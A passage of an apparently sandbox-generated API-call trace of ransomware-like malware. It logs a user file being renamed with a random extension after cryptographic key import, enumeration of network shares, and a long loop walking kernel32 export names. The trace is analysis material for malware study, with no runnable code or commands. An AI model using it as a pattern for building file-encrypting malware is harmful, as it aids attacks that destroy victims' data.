(lpString="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 49 [0090.206] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.BaIi6QC") returned 57 [0090.206] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.BaIi6QC" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.baii6qc"), dwFlags=0x0) returned 1 [0090.209] CryptDestroyKey (hKey=0x5f8a98) returned 1 [0090.209] CryptReleaseContext (hProv=0x61eb40, dwFlags=0x0) returned 1 [0090.209] RtlExitUserThread (Status=0x0) Thread: id = 114 os_tid = 0xba4 [0071.082] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0071.083] CryptAcquireContextW (in: phProv=0xf90004, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xf90004*=0x61ebc8) returned 1 [0071.083] CryptImportKey (in: hProv=0x61ebc8, pbData=0xdb0000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0xf90008 | out: phKey=0xf90008*=0x5f8b18) returned 1 [0071.091] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x410f950 | out: lphEnum=0x410f950*=0x5f8b58) returned 0x0 [0071.091] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0071.092] WNetEnumResourceW (in: hEnum=0x5f8b58, lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c | out: lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c) returned 0x0 [0071.092] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0xfa0000, lphEnum=0x410f920 | out: lphEnum=0x410f920*=0x61b7f0) returned 0x0 [0071.117] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.117] WNetEnumResourceW (in: hEnum=0x61b7f0, lpcCount=0x410f924, lpBuffer=0xfb0000, lpBufferSize=0x410f91c | out: lpcCount=0x410f924, lpBuffer=0xfb0000, lpBufferSize=0x410f91c) returned 0x103 [0071.117] lstrlenA (lpString="kernel32.dll") returned 12 [0071.117] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0071.117] lstrcpyA (in: lpString1=0x410ec90, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0071.117] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0071.117] lstrcpyA (in: lpString1=0x410ec90, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0071.118] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0071.118] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0071.118] lstrlenA (lpString="ADDATOMA") returned 8 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0071.118] lstrlenA (lpString="ADDATOMW") returned 8 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0071.118] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0071.118] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0071.118] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0071.118] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0071.118] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0071.118] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0071.118] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0071.118] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0071.118] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0071.118] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0071.118] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0071.118] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0071.118] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0071.118] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0071.118] lstrcpyA (in: lpString1=0x410ec90, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0071.118] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0071.119] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0071.119] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0071.119] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0071.119] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0071.119] lstrlenA (lpString="BACKUPREAD") returned 10 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0071.119] lstrlenA (lpString="BACKUPSEEK") returned 10 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0071.119] lstrlenA (lpString="BACKUPWRITE") returned 11 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0071.119] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0071.119] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0071.119] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0071.119] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0071.119] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0071.119] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0071.119] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0071.119] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0071.119] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0071.119] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0071.119] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0071.119] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0071.120] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0071.120] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0071.120] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0071.120] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0071.120] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0071.120] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0071.120] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0071.120] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0071.120] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0071.120] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0071.120] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0071.120] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0071.120] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0071.120] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0071.120] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0071.120] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0071.120] lstrlenA (lpString="BEEP") returned 4 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0071.120] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0071.120] lstrcpyA (in: lpString1=0x410ec90, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0071.121] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0071.121] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0071.121] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0071.121] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0071.121] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0071.121] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0071.121] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0071.121] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0071.121] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0071.121] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0071.121] lstrlenA (lpString="CANCELIO") returned 8 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0071.121] lstrlenA (lpString="CANCELIOEX") returned 10 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0071.121] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0071.121] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0071.121] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0071.121] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0071.121] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0071.121] lstrlenA (lpString="CHECKELEVATION") returned 14 [0071.121] lstrcpyA (in: lpString1=0x410ec90, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0071.121] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0071.122] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0071.122] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0071.122] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0071.122] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0071.122] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0071.122] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0071.122] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0071.122] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0071.122] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0071.122] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0071.122] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0071.122] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0071.122] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0071.122] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0071.122] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0071.122] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0071.122] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0071.122] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0071.122] lstrcpyA (in: lpString1=0x410ec90, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0071.123] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0071.123] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0071.123] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0071.123] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0071.123] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0071.123] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0071.123] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0071.123] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0071.123] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0071.123] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0071.123] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0071.123] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0071.123] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0071.123] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0071.123] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0071.123] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0071.123] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0071.123] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0071.123] lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0071.123] lstrlenA (lpString="COPYCONTEXT") returned 11 [0071.124] 